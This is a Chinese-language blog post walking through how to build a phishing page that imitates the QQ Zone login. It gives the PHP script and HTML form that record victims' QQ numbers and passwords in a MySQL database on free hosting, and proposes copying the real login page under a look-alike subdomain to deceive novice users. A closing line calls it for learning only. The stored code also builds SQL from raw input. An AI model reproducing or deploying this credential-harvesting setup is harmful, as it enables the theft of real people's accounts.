伪装qq空间登录

今天在群里，有个人发了个伪装qq空间的登录界面，也就是所谓的钓鱼网站。不知道的人会去登录，然后他们的qq号及密码会被记录，qq就这样被盗了。

外面下雨，呆宿舍无聊，于是我也想弄个玩玩。

其实思路很简单：做个高仿的qq空间登录界面->对用户输入的信息post到后台并存入数据库。

在学校用jsp也做了不少的xxx管理系统，知识都是相通的，php也差不多，下午花了点时间学了点php接收前台数据和写入数据库基本知识。下面开搞：

1.申请免费空间，我选择：http://www.freewebhostingarea.com/ 这个支持php，mysql.申请的空间 3个月没访问的话自动收回。申请成功会得到一个2级域名，这里我申请的是：http://fjut.ueuo.com。

2.在它提供的phpMyAdmin中，新建一个表：qq_info 字段：qq, pwd。类型为varchar(20)。

3.写个测试后台接收数据并写入数据库的php页面 Info_Rec.php ：

<?php
//接收参数
$nameStr=$HTTP_POST_VARS["name"];
$pwdStr=$HTTP_POST_VARS["pwd"];

//连接数据库
$con=mysql_connect("localhost","填写数据库名","填写密码") or die("<br>连接服务器失败!");
//sql语句串
$sql="insert into qq_info values('".$nameStr."','".$pwdStr."')";
//发送查询字符串
$query=mysql_db_query("填写数据库名", $sql, $con) or die("<br>写入数据库失败!");
echo "<br>保存到数据库成功!"
?>

4.前台页面，先写个测试页面 index.html ：

<form method="post" action="Info_Rec.php">
qq号：<input name="name" type="text"  value=""/> 
<br>
密码：<input name="pwd" type="password"  value=""/>
<br>
<input  type="submit" name="Submit" value="登录"/>
</form>

5.上传2个页面文件到空间根目录。

6.打开http://fjut.ueuo.com输入qq号和密码，点登陆。

7.响应成功：

8.打开phpMyAdmin查看qq_info表，说明提交、写入数据库成功：

9.基本功能有了。有时间的话把qq空间的登录界面扒过来做个高仿的，再重新申请个空间2级域名类似user.qzone……。更能达到迷惑小白的效果。

ps:学习交流，咋不做坏事哦。